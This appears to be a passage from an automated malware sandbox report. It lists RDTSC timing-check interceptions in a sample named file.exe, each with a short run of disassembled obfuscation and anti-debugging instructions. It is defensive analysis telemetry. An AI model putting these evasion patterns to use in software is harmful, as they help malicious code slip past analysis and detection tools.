                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B692CB second address: B692E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B692E5 second address: B6930B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FF624B4E7D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6959D second address: B695B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752FAh 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007FF624C752FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B695B8 second address: B695C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624B4E7D8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B695C8 second address: B695CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B736E1 second address: B736FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DDh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B736FB second address: B736FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B73813 second address: B73817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B73817 second address: B7382E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a js 00007FF624C752F6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7382E second address: B73832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B73832 second address: B73838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B73DD5 second address: B73DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B73DD9 second address: B73DF3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C752FCh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B73DF3 second address: B73DFD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624B4E7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B774A8 second address: B774AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B774AC second address: B774B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B77B54 second address: B77B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B77C36 second address: B77C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B780D0 second address: B780E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B781B3 second address: B781B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B781B7 second address: B781CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FF624C752F6h 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B781CA second address: B781D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7824F second address: B78253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B78253 second address: B78259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B78259 second address: B78273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FF624C752FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B78273 second address: B78278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B78278 second address: B7827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7827E second address: B78282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B78603 second address: B78609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7878B second address: B78790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B78790 second address: B787F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FF624C752F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF624C752F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx esi, dx 0x0000002c jmp 00007FF624C75309h 0x00000031 xchg eax, ebx 0x00000032 jg 00007FF624C75300h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e jg 00007FF624C752F6h 0x00000044 popad 0x00000045 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B787F7 second address: B7880A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DFh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7DA78 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7DA7C second address: B7DA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7DA80 second address: B7DA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7DA86 second address: B7DA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7F9D8 second address: B7F9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B7F9DC second address: B7F9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B81003 second address: B8106D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FF624C752F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, C74Ah 0x00000013 adc ebx, 47C85D40h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FF624C752F8h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push esi 0x00000036 pushad 0x00000037 add dword ptr [ebp+124517A8h], ecx 0x0000003d mov dword ptr [ebp+122D19B0h], edi 0x00000043 popad 0x00000044 pop ebx 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+122D183Dh] 0x0000004c movzx ecx, si 0x0000004f popad 0x00000050 push 00000000h 0x00000052 add edi, dword ptr [ebp+122D1D70h] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jne 00007FF624C752F6h 0x00000063 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8106D second address: B81073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8653D second address: B86542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B86542 second address: B86548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B81235 second address: B81242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8406A second address: B84070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B81242 second address: B81247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B89712 second address: B89718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8233E second address: B82344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B84070 second address: B84074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B81247 second address: B8124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B89718 second address: B89741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FF624B4E7D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 jnp 00007FF624B4E7DEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B84074 second address: B8408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FCh 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B89741 second address: B89745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8408C second address: B8414B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF624C752FCh 0x0000000e popad 0x0000000f nop 0x00000010 xor bx, F20Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF624C752F8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 add dword ptr [ebp+1244E042h], ecx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 add ebx, 5A3A60A7h 0x00000049 sub dword ptr [ebp+122D1DCDh], edi 0x0000004f mov eax, dword ptr [ebp+122D00ADh] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FF624C752F8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bx, 6600h 0x00000073 push FFFFFFFFh 0x00000075 jp 00007FF624C752FCh 0x0000007b mov edi, dword ptr [ebp+122D2CA3h] 0x00000081 sub ebx, dword ptr [ebp+122D1995h] 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b jmp 00007FF624C75309h 0x00000090 push ebx 0x00000091 pop ebx 0x00000092 popad 0x00000093 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81356 second address: B81360 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8AD08 second address: B8AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81360 second address: B81366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C299 second address: B8C2FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF624C752F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FF624C752F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 call 00007FF624C75302h 0x00000035 mov bx, 56A7h 0x00000039 pop edi 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d mov bl, 8Bh 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FF624C752FCh 0x00000049 jno 00007FF624C752F6h 0x0000004f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B547 second address: B8B558 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8B558 second address: B8B55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E2F0 second address: B8E351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 45598F98h 0x0000000f push 00000000h 0x00000011 sbb bl, FFFFFFB7h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FF624B4E7D8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push esi 0x00000032 jmp 00007FF624B4E7E8h 0x00000037 pop esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E351 second address: B8E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F271 second address: B8F275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F275 second address: B8F292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624C75303h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9035B second address: B9035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9035F second address: B90363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D3D8 second address: B8D3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E4AC second address: B8E4BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF624C752F6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B924E0 second address: B924EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B916B5 second address: B916CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jo 00007FF624C75300h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C488 second address: B8C50F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244E12Ch], esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FF624B4E7D8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 and bh, FFFFFFF1h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FF624B4E7D8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 mov eax, dword ptr [ebp+122D0CB1h] 0x0000005f xor bh, FFFFFFB3h 0x00000062 push FFFFFFFFh 0x00000064 sbb ebx, 33D388C9h 0x0000006a nop 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8C50F second address: B8C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B933D3 second address: B933DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92655 second address: B92659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92659 second address: B92662 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93540 second address: B935A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c adc bl, FFFFFFD0h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov bx, CDE2h 0x00000021 mov eax, dword ptr [ebp+122D0DB5h] 0x00000027 pushad 0x00000028 cld 0x00000029 call 00007FF624C75306h 0x0000002e pop esi 0x0000002f popad 0x00000030 push FFFFFFFFh 0x00000032 push esi 0x00000033 pop ebx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF624C75308h 0x0000003e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B935A2 second address: B935B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F22F second address: B2F233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CCF6 second address: B9CD1A instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7E0h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CD1A second address: B9CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CD1E second address: B9CD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C636 second address: B9C649 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF624C752F6h 0x00000008 jng 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0DE3 second address: BA0DFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FF624B4E7DCh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0DFC second address: BA0E0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0E0F second address: BA0E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0E16 second address: BA0E20 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624C752FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
